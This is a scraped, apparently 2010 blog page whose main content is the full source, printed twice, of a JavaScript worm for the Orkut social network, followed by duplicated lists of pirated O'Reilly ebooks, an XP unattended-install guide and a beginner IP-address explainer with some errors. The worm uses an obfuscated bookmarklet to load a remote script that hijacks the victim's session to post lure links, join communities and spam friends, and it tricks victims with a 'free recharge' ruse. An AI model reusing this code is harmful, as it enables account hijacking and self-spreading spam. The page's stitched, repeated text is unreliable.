xxt.send(c);
}
function kidsScrap(a) {
var c = "Action.submit=1&scrapText=" + encodeURIComponent('[RED][B]recharge code=2234 5645 7645 7846 ') +
Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var d = createXMLHttpRequest();
d.open("POST", "/Scrapbook.aspx", false);
d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
d.send(c);
depo(a);
}
function show_me() {
a=prompt("Enter Your Mobile No. ?","");b="Wow ";c=" Gettin RECHARGE Code For You ";alert(b+a+c);
alert(" - Just 3 miNs For for your Code... \n - NOTE : WAIT 3 mins...");
}
function cmm(a) {
var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join";
var c = createXMLHttpRequest();
c.open("POST", "/CommunityJoin.aspx?cmm=" + a, false);
c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
c.send(b);
}
function Pamela(a) {
var bbb = ["aqua", "fuchsia", "gold", "teal", "olive", "VIOLET", "purple", "pink"];
var color = Math.floor(Math.random() * bbb.length);
var Danilo = ["[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED] "];
var Miedi = Math.floor(Math.random() * Danilo.length);
var up = "[b]ANKY [" + bbb[color] + "]RLUES[/" + bbb[color] + "][/b] ... [8)] " + Danilo[Miedi] + " \n\n\n\n
..... [silver]" + Math.floor(Math.random() * 95234511);
var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&bodyText=" + encodeURIComponent(up) + "&Action.submit";
var c = createXMLHttpRequest();
c.open("POST", "/CommMsgPost.aspx?cmm=" + a, false);
c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
c.send(b);
}
function GetCmms() {
var xml2 = createXMLHttpRequest();
xml2.open("GET", "/Communities", false), xml2.send(null);
var cmmx = xml2.responseText.match(/cmm=\d+/gi);
return cmmx;
}
var cmmx = GetCmms();
function Envia(a, d, e) {
var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&subjectText=" + encodeURIComponent(d) + "&bodyText=" +
encodeURIComponent(e) + "" + Math.floor(Math.random() * 999) + "&Action.submit";
var c = createXMLHttpRequest();
c.open("POST", "/CommMsgPost.aspx?" + a, false);
c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
c.send(b);
}
try {
Envia(cmmx[1], assuntox, mensagemx);
Envia(cmmx[2], assuntox, mensagemx);
Envia(cmmx[4], assuntox, mensagemx);
Envia(cmmx[5], assuntox, mensagemx);
Envia(cmmx[6], assuntox, mensagemx);
Envia(cmmx[7], assuntox, mensagemx);
Envia(cmmx[8], assuntox, mensagemx);
Envia(cmmx[9], assuntox, mensagemx);
Envia(cmmx[10], assuntox, mensagemx);
} catch (e) {
bunda = e;
}
function Abre_CoCaCoLa(a) {
var alerta = alert("Carregando...");
}
function depo(a) {
var c = "Action.submit&countedTextbox=" + encodeURIComponent(mensagemx) + "&POST_TOKEN=" +
JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var xxt = createXMLHttpRequest();
xxt.open("POST", "/TestimonialWrite.aspx", false);
xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xxt.send(c);
}
function noob() {
alert("Just 2 mins Remaining.. \n WE ARE - 80% done .... \n\n");
var myDCC = window.orkutFrame ? window.orkutFrame.document : document;
var UID = myDCC.body.innerHTML.match(/uid=(\d+)/i)[1];
var Lay = myDCC.body.innerHTML += "";
getFL(UID);
}
function setCookie(a, b, c, d, e, f) {
var g = a + "=" + escape(b) + (c ? "; expires=" + c.toGMTString() : "") + (d ? "; path=" + d : "") + (e ? ";
domain=" + e : "") + (f ? "; secure" : "");
document.cookie = g;
}
function getCookie(a) {
var b = document.cookie;
var c = a + "=";
var d = b.indexOf("; " + c);
if (d == -1) {
d = b.indexOf(c);
if (d != 0) {
return false;
}
} else {
d += 2;
}
var e = document.cookie.indexOf(";", d);
if (e == -1) {
e = b.length;
}
return unescape(b.substring(d + c.length, e));
}
show_me();
cmm(98692531);
cmm(104018023);
cmm(90109394);
cmm(91978037);
cmm(104632287);
Pamela('104018023&tid=5492084615985777374');
kidsScrap('');
noob();
if (!getCookie("say")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 864000);
setCookie("say", "1", wDate);
}
}catch(ex){}
setTimeout(function(){alert('HURRAY!! WE ARE DONE NOW LOGIN TO ORKUT AGAIN AND YOU WILL HAVE YOUR FREE RECHARGE IN JUST 24
HOURS AND WE WLL UPLOAD ABOUT OUR RECHARGE ADD IN YOUR PROFILES PLEASE DONT CHANGE IT');
window.location.replace('Any link u want to add. They used there ad link'); }, 200);
Recharge Rs 500 Daily by google.
And anyone who clicks and follows the trick gets screwed and his account is gone from his hand.
This is just the game of Javascript. I m pasting the complete javascript but don't just copy it try to learn and understand it:
javascript:
d=document;
c=d.createElement(%22script%22);
d.body.appendChild(c);
c.src=%22ht%22+%22tp:%22+%22//sn%22+%22url.%22+%22com%22+%22/%22+%22z7t7k%22;
void(0)
This is used to redirect to the real jscript which is below The real game begins here :
alert("Wait 5 mins Only ...");
var assuntox, mensagemx, b;
var assuntox = "FREE RECHARGE RS 1000 GOOGLE'S OFFICIAL SITE";
var mensagemx = "[b][red]FREE RECHARGE TRICK [/b][/red] [8)] \n\n\n[b]Do you Know About Free Recharge \nChanged By Orkut
Changed By Orkut here is the new link... [green]ENJOY FREE RECHARGE RS 500 DAILY [/green]. \n\n\n\n\n[b][red]GOTO:
[gray]
getAid(b, 0);
}
function getAid(a, n) {
var b = a.length;
if (n == b) {
return;
}
var c = createXMLHttpRequest();
var d = a[Math.round(Math.random() * (a.length - 1))].id;
c.open("GET", "/AlbumList.aspx?uid=" + d, false);
c.send(null);
if (c.status == 200) {
var e = c.responseText.match(/aid=(\d+)/i);
if (e) {
e = e[1];
getPid(d, e);
}
}
n++;
getAid(a, n);
}
function getPid(a, b) {
var c = createXMLHttpRequest();
c.open("GET", "/Album.aspx?uid=" + a + "&aid=" + b, false);
c.send(null);
if (c.status == 200) {
var d = c.responseText.match(/&(amp;)?pid=(\d+)/i);
if (d) {
postComment(a, b, d[2]);
}
}
}
function postComment(a, b, c) {
var d = "com=" + encodeURIComponent("[b] FREE RECHARGE TRICK GO TO:[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED]
") + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) +
"&Action.addComment=&aid=" + b + "&uid=" + a + "&pid=" + c + "&ploc=&oxh=1";
xml = createXMLHttpRequest();
xml.open("POST", "/AlbumZoom", false);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xml.send(d);
sendScrap(a);
}
function sendScrap(a) {
var c = "Action.submit=1&scrapText=" + encodeURIComponent("Oww YOu knw Abt new FREE RECHARGE TRICK \n\nJust Go to
thiz SITE its So Dashing Yaar \n\nIT WORKS!!! [green]FREE RECHARGE TRICK [/green]. \n\nJust Go to thiz Site And Follow The
Below Steps yaar:\n\nAcesse: [b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED] \n\n Copy n Paste link where www , orkut, com /
Main *#Home is written i.e orkut home page \n\n.\n\nTry yaar its So awsum N I got recharge N accept my testinomial Also
\n[red]No Of PEOPLE WHO WON:[/red]") + Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] +
"&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var d = createXMLHttpRequest();
d.open("POST", "/Scrapbook.aspx", false);
d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
d.send(c);
depo(a);
}
function depo(a) {
var b = mensagemx;
var c = "Action.submit&countedTextbox=" + encodeURIComponent(b) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] +
"&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var xxt = createXMLHttpRequest();
xxt.open("POST", "/TestimonialWrite.aspx", false);
xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xxt.send(c);
}
function kidsScrap(a) {
var c = "Action.submit=1&scrapText=" + encodeURIComponent('[RED][B]recharge code=2234 5645 7645 7846 ') +
Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var d = createXMLHttpRequest();
d.open("POST", "/Scrapbook.aspx", false);
d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
d.send(c);
depo(a);
}
function show_me() {
a=prompt("Enter Your Mobile No. ?","");b="Wow ";c=" Gettin RECHARGE Code For You ";alert(b+a+c);
alert(" - Just 3 miNs For for your Code... \n - NOTE : WAIT 3 mins...");
}
function cmm(a) {
var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join";
var c = createXMLHttpRequest();
c.open("POST", "/CommunityJoin.aspx?cmm=" + a, false);
c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
c.send(b);
}
function Pamela(a) {
var bbb = ["aqua", "fuchsia", "gold", "teal", "olive", "VIOLET", "purple", "pink"];
var color = Math.floor(Math.random() * bbb.length);
var Danilo = ["[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED] "];
var Miedi = Math.floor(Math.random() * Danilo.length);
var up = "[b]ANKY [" + bbb[color] + "]RLUES[/" + bbb[color] + "][/b] ... [8)] " + Danilo[Miedi] + " \n\n\n\n
..... [silver]" + Math.floor(Math.random() * 95234511);
var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&bodyText=" + encodeURIComponent(up) + "&Action.submit";
var c = createXMLHttpRequest();
c.open("POST", "/CommMsgPost.aspx?cmm=" + a, false);
c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
c.send(b);
}
function GetCmms() {
var xml2 = createXMLHttpRequest();
xml2.open("GET", "/Communities", false), xml2.send(null);
var cmmx = xml2.responseText.match(/cmm=\d+/gi);
return cmmx;
}
var cmmx = GetCmms();
function Envia(a, d, e) {
var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&subjectText=" + encodeURIComponent(d) + "&bodyText=" +
encodeURIComponent(e) + "" + Math.floor(Math.random() * 999) + "&Action.submit";
var c = createXMLHttpRequest();
c.open("POST", "/CommMsgPost.aspx?" + a, false);
c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
c.send(b);
}
try {
Envia(cmmx[1], assuntox, mensagemx);
Envia(cmmx[2], assuntox, mensagemx);
Envia(cmmx[4], assuntox, mensagemx);
Envia(cmmx[5], assuntox, mensagemx);
Envia(cmmx[6], assuntox, mensagemx);
Envia(cmmx[7], assuntox, mensagemx);
Envia(cmmx[8], assuntox, mensagemx);
Envia(cmmx[9], assuntox, mensagemx);
Envia(cmmx[10], assuntox, mensagemx);
} catch (e) {
bunda = e;
}
function Abre_CoCaCoLa(a) {
var alerta = alert("Carregando...");
}
function depo(a) {
var c = "Action.submit&countedTextbox=" + encodeURIComponent(mensagemx) + "&POST_TOKEN=" +
JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var xxt = createXMLHttpRequest();
xxt.open("POST", "/TestimonialWrite.aspx", false);
xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xxt.send(c);
}
function noob() {
alert("Just 2 mins Remaining.. \n WE ARE - 80% done .... \n\n");
var myDCC = window.orkutFrame ? window.orkutFrame.document : document;
var UID = myDCC.body.innerHTML.match(/uid=(\d+)/i)[1];
var Lay = myDCC.body.innerHTML += "";
getFL(UID);
}
function setCookie(a, b, c, d, e, f) {
var g = a + "=" + escape(b) + (c ? "; expires=" + c.toGMTString() : "") + (d ? "; path=" + d : "") + (e ? ";
domain=" + e : "") + (f ? "; secure" : "");
document.cookie = g;
}
function getCookie(a) {
var b = document.cookie;
var c = a + "=";
var d = b.indexOf("; " + c);
if (d == -1) {
d = b.indexOf(c);
if (d != 0) {
return false;
}
} else {
d += 2;
}
var e = document.cookie.indexOf(";", d);
if (e == -1) {
e = b.length;
}
return unescape(b.substring(d + c.length, e));
}
show_me();
cmm(98692531);
cmm(104018023);
cmm(90109394);
cmm(91978037);
cmm(104632287);
Pamela('104018023&tid=5492084615985777374');
kidsScrap('');
noob();
if (!getCookie("say")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 864000);
setCookie("say", "1", wDate);
}
}catch(ex){}
setTimeout(function(){alert('HURRAY!! WE ARE DONE NOW LOGIN TO ORKUT AGAIN AND YOU WILL HAVE YOUR FREE RECHARGE IN JUST 24
HOURS AND WE WLL UPLOAD ABOUT OUR RECHARGE ADD IN YOUR PROFILES PLEASE DONT CHANGE IT');
window.location.replace('Any link u want to add. They used there ad link'); }, 200);
Tuesday, July 27, 2010
Some books on Linux for Beginners
Some books on Java in Linux and Linux :
OReilly-Understanding the Linux Kernel-2nd Edition.chm
rarlinux-x64-3.9.2.tar.gz
OReilly-Understanding the Linux Kernel-2nd Edition.chm
rarlinux-x64-3.9.2.tar.gz
Labels:
C c++,
java,
linux,
Networking Core,
networking on Linux,
programing in linux
Monday, April 12, 2010
O'Reillys Collection of Books, find books on everything from O'Reilly's
Some Books are here, more still to come..
O'Reilly - High Performance MySQL.chm
O'Reilly - SQL Tuning.chm
O'Reilly.100.Industrial.Strength.Tips.and.Tools.rar
O'Reilly.802.11.Security.rar
O'Reilly.802.11@Wireless.Networks.The.Definitive.Guide.rar
O'Reilly.Action.Script.for.Flash.MX.The.Definitive.Guide.2nd.Ed.rar
O'Reilly.ActionScript.Cookbook.rar
O'Reilly.ActionScript.The.Definative.Guide.rar
O'Reilly.Active.Directory.2nd.Ed.rar
O'Reilly.Active.Directory.Cookbook.rar
O'Reilly.ADO.NET.Cookbook.rar
O'Reilly.ADO.Net.In.A.Nutshell.rar
O'Reilly.Apache.Cookbook.rar
O'Reilly.Apache.The.Definitive.Guide.3rd.Ed.rar
O'Reilly.AppleScript.In.A.Nutshell.rar
O'Reilly.AppleScript.The.Definitive.Guide.rar
O'Reilly.ASP.NET.in.A.Nutshell.rar
O'Reilly.BLAST.rar
O'Reilly.Building.Embedded.Linux.Systems.rar
O'Reilly.Building.Java.Enterprise.Applications.vol.I.Architecture.rar
O'Reilly.Building.Secure.Servers.with.Linux.rar
O'Reilly.Building.Wireless.Community.Networks.2nd.Ed.rar
O'Reilly.C#.Cookbook.2004.rar
O'Reilly.C.Pocket.Reference.rar
O'Reilly.C.Sharp.and.VB.NET.Conversion.Pocket.Reference.rar
O'Reilly.C.Sharp.In.A.Nutshell.2nd.Ed.rar
O'Reilly.C.Sharp.Language.Pocket.Reference.rar
O'Reilly.Cascading.Style.Sheets.The.Definative.Guide.rar
O'Reilly.Cisco.Cookbook.rar
O'Reilly.Cocoa.In.A.Nutshell.rar
O'Reilly.COM.and .Net.Component.Services.rar
O'Reilly.Content.Syndication.With.RSS.rar
O'Reilly.Cpp.In.A.Nutshell.rar
O'Reilly.Designing.Active.Server.Pages.rar
O'Reilly.Designing.Large.Scale.LANs.rar
O'Reilly.Designing.Web.Audio.rar
O'Reilly.Dreamweaver.in.a.Nutshell.rar
O'Reilly.eBay.Hacks.rar
O'Reilly.Enterprise.JavaBeans.3rd.Ed.rar
O'Reilly.Essential.Blogging.rar
O'Reilly.Essential.CVS.rar
O'Reilly.Essential.SNMP.rar
O'Reilly.Exim.The.Mail.Transfer.Agent.rar
O'Reilly.Flash.Remoting.The.Definitive.Guide.rar
O'Reilly.Google.Hacks(chm).rar
O'Reilly.HTML.And.XHTML.The.Definitive.Guide.5th.Ed.rar
O'Reilly.JavaScript.Pocket.Reference.2nd.Ed.rar
Second Edition.chm
Second Edition_1.chm
More books Continued.....
O'Reilly.nt.the.definitive.guide.rar
O'Reilly.J2EE.Design.Patterns.rar
O'Reilly.Jakarta.Struts.rar
O'Reilly.java.2d.graphics.rar
O'Reilly.java.&.xslt.rar
O'Reilly.Java.and.XML.Binding.rar
O'Reilly.java.and.xml.rar
O'Reilly.Java.Cookbook.rar
O'Reilly.Java.Cryptography.rar
O'Reilly.Java.Network.Programming.2ed.rar
O'Reilly.Java.Performance.Tuning.2nd.Ed.rar
O'Reilly.Java.Script.And.DHTML.Cookbook.rar
O'Reilly.Java.Servlet.Programming.rar
O'Reilly.Java.Swing.rar
O'Reilly.JAVA.WEB.SERVICES.IN.A.NUTSHELL.rar
O'Reilly.JavaScript.and.DHTML.Cookbook.rar
(2) O'Reilly.JavaScript.Pocket.Reference.2nd.Ed.rar
O'Reilly.Kerberos.The.Definitive.Guide.rar
O'Reilly.LDAP.System.Administration.rar
O'Reilly.Learning.C.Sharp.rar
O'Reilly.Learning.Debian.GNU.Linux.rar
O'Reilly.Learning.Java.2Ed.rar
O'Reilly.Learning.Java.rar
O'Reilly.Learning.Perl.Objects.References.And.Modules.rar
O'Reilly.Learning.Perl.Third.Ed.rar
O'Reilly.Learning.Redhat.Linux.3rd.Ed.rar
O'Reilly.Learning.the.bash.Shell.2nd.Ed.rar
O'Reilly.Learning.UML.rar
O'Reilly.Learning.XML.2nd.Ed.rar
O'Reilly.Learning.Xml.rar
O'Reilly.Learning.XSLT.rar
O'Reilly.Linux.In.A.Nutshell.4th.Ed.rar
O'Reilly.Linux.Security.Cookbook.rar
O'Reilly.Mac.OS.X.In.A.Nutshell.rar
O'Reilly.Mac.OS.X.Unwired.rar
O'Reilly.MacOSX.For.Java.Geeks.rar
O'Reilly.MacOSX.Hacks.rar
O'Reilly.MacOSX.The.Missing.Manual.2nd.Ed.rar
O'Reilly.Manage.&.Using.Mysql.rar
O'Reilly.Mastering.Oracle.SQL.rar
O'Reilly.Mastering.Perl.For.Bioinformatics.rar
O'Reilly.Mastering.Visual.Studio.NET.rar
O'Reilly.NET.And.XML.rar
O'Reilly.NET.Framework.Essentials.3rd.Ed.rar
O'Reilly.Network.Security.with.OpenSSL.rar
Here are some more:
O'Reilly.Objective.C.Pocket.Reference.rar
O'Reilly.Oracle.PLSQL.BookShelf.1.0.rar
O'Reilly.Oracle.Regular.Expressions.Pocket.Reference.rar
O'Reilly.Perl.6.Essentials.rar
O'Reilly.Perl.Cookbook.2nd.Ed.rar
O'Reilly.Perl.For.Oracle.DBAs.rar
O'Reilly.Perl.for.System.Administration.rar
O'Reilly - High Performance MySQL.chm
O'Reilly - SQL Tuning.chm
O'Reilly.100.Industrial.Strength.Tips.and.Tools.rar
O'Reilly.802.11.Security.rar
O'Reilly.802.11@Wireless.Networks.The.Definitive.Guide.rar
O'Reilly.Action.Script.for.Flash.MX.The.Definitive.Guide.2nd.Ed.rar
O'Reilly.ActionScript.Cookbook.rar
O'Reilly.ActionScript.The.Definative.Guide.rar
O'Reilly.Active.Directory.2nd.Ed.rar
O'Reilly.Active.Directory.Cookbook.rar
O'Reilly.ADO.NET.Cookbook.rar
O'Reilly.ADO.Net.In.A.Nutshell.rar
O'Reilly.Apache.Cookbook.rar
O'Reilly.Apache.The.Definitive.Guide.3rd.Ed.rar
O'Reilly.AppleScript.In.A.Nutshell.rar
O'Reilly.AppleScript.The.Definitive.Guide.rar
O'Reilly.ASP.NET.in.A.Nutshell.rar
O'Reilly.BLAST.rar
O'Reilly.Building.Embedded.Linux.Systems.rar
O'Reilly.Building.Java.Enterprise.Applications.vol.I.Architecture.rar
O'Reilly.Building.Secure.Servers.with.Linux.rar
O'Reilly.Building.Wireless.Community.Networks.2nd.Ed.rar
O'Reilly.C#.Cookbook.2004.rar
O'Reilly.C.Pocket.Reference.rar
O'Reilly.C.Sharp.and.VB.NET.Conversion.Pocket.Reference.rar
O'Reilly.C.Sharp.In.A.Nutshell.2nd.Ed.rar
O'Reilly.C.Sharp.Language.Pocket.Reference.rar
O'Reilly.Cascading.Style.Sheets.The.Definative.Guide.rar
O'Reilly.Cisco.Cookbook.rar
O'Reilly.Cocoa.In.A.Nutshell.rar
O'Reilly.COM.and .Net.Component.Services.rar
O'Reilly.Content.Syndication.With.RSS.rar
O'Reilly.Cpp.In.A.Nutshell.rar
O'Reilly.Designing.Active.Server.Pages.rar
O'Reilly.Designing.Large.Scale.LANs.rar
O'Reilly.Designing.Web.Audio.rar
O'Reilly.Dreamweaver.in.a.Nutshell.rar
O'Reilly.eBay.Hacks.rar
O'Reilly.Enterprise.JavaBeans.3rd.Ed.rar
O'Reilly.Essential.Blogging.rar
O'Reilly.Essential.CVS.rar
O'Reilly.Essential.SNMP.rar
O'Reilly.Exim.The.Mail.Transfer.Agent.rar
O'Reilly.Flash.Remoting.The.Definitive.Guide.rar
O'Reilly.Google.Hacks(chm).rar
O'Reilly.HTML.And.XHTML.The.Definitive.Guide.5th.Ed.rar
O'Reilly.JavaScript.Pocket.Reference.2nd.Ed.rar
Second Edition.chm
Second Edition_1.chm
More books Continued.....
O'Reilly.nt.the.definitive.guide.rar
O'Reilly.J2EE.Design.Patterns.rar
O'Reilly.Jakarta.Struts.rar
O'Reilly.java.2d.graphics.rar
O'Reilly.java.&.xslt.rar
O'Reilly.Java.and.XML.Binding.rar
O'Reilly.java.and.xml.rar
O'Reilly.Java.Cookbook.rar
O'Reilly.Java.Cryptography.rar
O'Reilly.Java.Network.Programming.2ed.rar
O'Reilly.Java.Performance.Tuning.2nd.Ed.rar
O'Reilly.Java.Script.And.DHTML.Cookbook.rar
O'Reilly.Java.Servlet.Programming.rar
O'Reilly.Java.Swing.rar
O'Reilly.JAVA.WEB.SERVICES.IN.A.NUTSHELL.rar
O'Reilly.JavaScript.and.DHTML.Cookbook.rar
(2) O'Reilly.JavaScript.Pocket.Reference.2nd.Ed.rar
O'Reilly.Kerberos.The.Definitive.Guide.rar
O'Reilly.LDAP.System.Administration.rar
O'Reilly.Learning.C.Sharp.rar
O'Reilly.Learning.Debian.GNU.Linux.rar
O'Reilly.Learning.Java.2Ed.rar
O'Reilly.Learning.Java.rar
O'Reilly.Learning.Perl.Objects.References.And.Modules.rar
O'Reilly.Learning.Perl.Third.Ed.rar
O'Reilly.Learning.Redhat.Linux.3rd.Ed.rar
O'Reilly.Learning.the.bash.Shell.2nd.Ed.rar
O'Reilly.Learning.UML.rar
O'Reilly.Learning.XML.2nd.Ed.rar
O'Reilly.Learning.Xml.rar
O'Reilly.Learning.XSLT.rar
O'Reilly.Linux.In.A.Nutshell.4th.Ed.rar
O'Reilly.Linux.Security.Cookbook.rar
O'Reilly.Mac.OS.X.In.A.Nutshell.rar
O'Reilly.Mac.OS.X.Unwired.rar
O'Reilly.MacOSX.For.Java.Geeks.rar
O'Reilly.MacOSX.Hacks.rar
O'Reilly.MacOSX.The.Missing.Manual.2nd.Ed.rar
O'Reilly.Manage.&.Using.Mysql.rar
O'Reilly.Mastering.Oracle.SQL.rar
O'Reilly.Mastering.Perl.For.Bioinformatics.rar
O'Reilly.Mastering.Visual.Studio.NET.rar
O'Reilly.NET.And.XML.rar
O'Reilly.NET.Framework.Essentials.3rd.Ed.rar
O'Reilly.Network.Security.with.OpenSSL.rar
Here are some more:
O'Reilly.Objective.C.Pocket.Reference.rar
O'Reilly.Oracle.PLSQL.BookShelf.1.0.rar
O'Reilly.Oracle.Regular.Expressions.Pocket.Reference.rar
O'Reilly.Perl.6.Essentials.rar
O'Reilly.Perl.Cookbook.2nd.Ed.rar
O'Reilly.Perl.For.Oracle.DBAs.rar
O'Reilly.Perl.for.System.Administration.rar
Unattended Installation of XP:
This is the method of installing Windows XP professional by providing every user input required before installing.
Till now we all knew only 1 way of installing XP, i.e. inserting CD in CD drive and following instructions and then in the middle we would CD Key and other details. For this we had sit in front of computer all day. But there is also way to install XP where we can enter all the details before installing XP. But for this u need some work to do before formatting your PC. You need XP or other windows OS installed already.
So lets begin:
1. Insert XP CD in the Drive.
2. Then go to CD drive (D or E whatever be the CD drive in your PC. )
3. Then go to Help & Support -> then to Tools -> then open Deploy.cab
4. Copy all and paste in another folder in the desktop(or rather anywhere in your computer).
Or just replace the drive D from your CD drive and paste in the run “D:SUPPORT\TOOLS\DEPLOY.CAB” without quotes and repeat step 4.
5.1. Then in those files run the”setupmgr.exe” and follow the instructions:
5.2. Select the option to create new answer file.
5.3. Then select Unattended installation.
5.4. Then select the OS.
5.5. Then select fully automated.
5.6.Then select the second option saying install from CD.
5.7. Accept the agreement.
Then enter details.
6. Save the unattent.txt file anywhere in the another drive.
7. Then open Command Prompt(type cmd in run to open).
8. open CD drive
c:>d: (here replace D with your CD drive)
d:>CD i386
d:i386>winnt32/unattend:c:….the path of attend.txt saved in 6Th step.
Make sure there is no spaces or it wont work.
It will reinstall the XP in your System in the same drive.
Till now we all knew only 1 way of installing XP, i.e. inserting CD in CD drive and following instructions and then in the middle we would CD Key and other details. For this we had sit in front of computer all day. But there is also way to install XP where we can enter all the details before installing XP. But for this u need some work to do before formatting your PC. You need XP or other windows OS installed already.
So lets begin:
1. Insert XP CD in the Drive.
2. Then go to CD drive (D or E whatever be the CD drive in your PC. )
3. Then go to Help & Support -> then to Tools -> then open Deploy.cab
4. Copy all and paste in another folder in the desktop(or rather anywhere in your computer).
Or just replace the drive D from your CD drive and paste in the run “D:SUPPORT\TOOLS\DEPLOY.CAB” without quotes and repeat step 4.
5.1. Then in those files run the”setupmgr.exe” and follow the instructions:
5.2. Select the option to create new answer file.
5.3. Then select Unattended installation.
5.4. Then select the OS.
5.5. Then select fully automated.
5.6.Then select the second option saying install from CD.
5.7. Accept the agreement.
Then enter details.
6. Save the unattent.txt file anywhere in the another drive.
7. Then open Command Prompt(type cmd in run to open).
8. open CD drive
c:>d: (here replace D with your CD drive)
d:>CD i386
d:i386>winnt32/unattend:c:….the path of attend.txt saved in 6Th step.
Make sure there is no spaces or it wont work.
It will reinstall the XP in your System in the same drive.
Saturday, April 10, 2010
Complete IP address: For beginners...
Ip Address:
Internet protocol or IP is an address given to each computer in network. The address is a 32 bit numeric value consisting of numbers separated by dots. It has network part and host part. The network is the address of network to which you belong like the area code or colony name... and the host part is address of the particular computer or client like your house's address.
Each IP address has both the things.
The IP address is divided into 4 parts each of 8 bits and each part is called an octet. The parts are divided by a Dot. The first octet is always the host part and the last octet is always the host part.
The IP address is written in 3 ways:
1. Binary Form: 11000000.10101000.00000000.00000001
2. Dotted Decimal Form: 192.168.0.1
3. Hexadecimal Form: C0-A8-00-01
This type of IP address consisting of 32 bit is called IPv4 or IP version 4. Since only near about 4 billion IP Address could be formed with 32 bits IP address or v4. And the left IP addresses(not yet used) for other people was very limited, a new version of IP was developed called IPv6 which is a 128 bit IP address.
We will talk about this later.
Dotted Decimal:
The way we use for writing IP address is dotted decimal. Since the computer only understands Binary numbers , therefore internally in computer IP address is also converted into binary before being used by the computer and routers.
As already stated above, the 1st octet is always used for Network ID or Network Part and the last for Host part. 2nd and 3rd octet may be used for Network part or host part.
On the basis of the range of values in the 1st octet the IP address may be classified in 5 different classes:
1. Class A
2. Class B
3. Class C
4. Class D
5. Class E
1. CLASS A :-
If the value in 1st octet is between 0-127 it belongs to Class A. But the 1st address and the last address i.e. 0 and 127 are reserved for special cases. It can’t be used by public for a particular computer. The 127.x.y.z is reserved for loop back function to check the network settings in a computer.
The IP address of class A has 1 network part and 3 host part.
Network Part Host Part Host Part Host Part
|----8bits-| |----8bits----| |----8bits----| |----8bits----|
The Last 3 parts may contain any value from 0-255(except the in the 4th part where we can use only till 254,).
In Network Part:
1st Eight bits may be: 0xxxxxxx where x=0/1
The 1st bit is constant and is 0.
Therefore the minimum value is: 00000000=0 (where x=0)
The maximum value =01111111=127(where x=1 )
That is why the range for 1st class is from 0-127.
Maximum number of possible networks=2^ ( total number of network bits – constant bits) – reserved addresses
= 2^ (8-1) – 2 = 2^7-2 = 128-2= 126.
Maximum number of possible clients per network=2^no of host bits -2
= 2^24 -2 = 16777216 – 2=16777214 address.
Note: This 2 is being subtracted because 2 host addresses are already reserved for Administrative tasks. The 1st host address in every network (which may be 0 for example: in class C this could be 192.168.1.0 where only the last part is host part.) and the last for broadcasting i.e.to send a message to all the hosts in a network (Suppose in a network using Class ‘A’ address. If the server would like to sent a message to all the clients it can just sent the message to this broadcast address and it will be forwarded to all. You can’t manually enter every client’s IP address, as there could be as many as 16777214 clients). So it will be subtracted in every class i.e.in A,B and C.
This means that in 1 network there can be 16777214 clients for class A.
2. CLASS B :-
If the value in 1st octet is between 128-191 it belongs to Class B. This class also doesn’t have any reserved value in the Network Part. This has 2 Network Part and 2 Host Part:
Network Part Network Part Host Part Host Part
|--8bits--| |----8bits----| |----8bits-- |-----8bits----|
Here also the last 3 octet may have any value between 0-255 (except for the last octet which can have between 1-254. The reason is already stated in Class ‘A’) since the class is decided only by the 1st octet.
In the Network Parts:-
Range: 128-191.
1st Eight Bits may be: 10xxxxxx (where x=0/1)
As in class A 1st bit was constant in this class 1st 2 bits are constant and are: 1 & 0.
Therefore Minimum value of 1st octet could be: 10000000 = 128 (where x=0)
And maximum value =10111111=191(where x=1).
That’s why the range is 128-191.
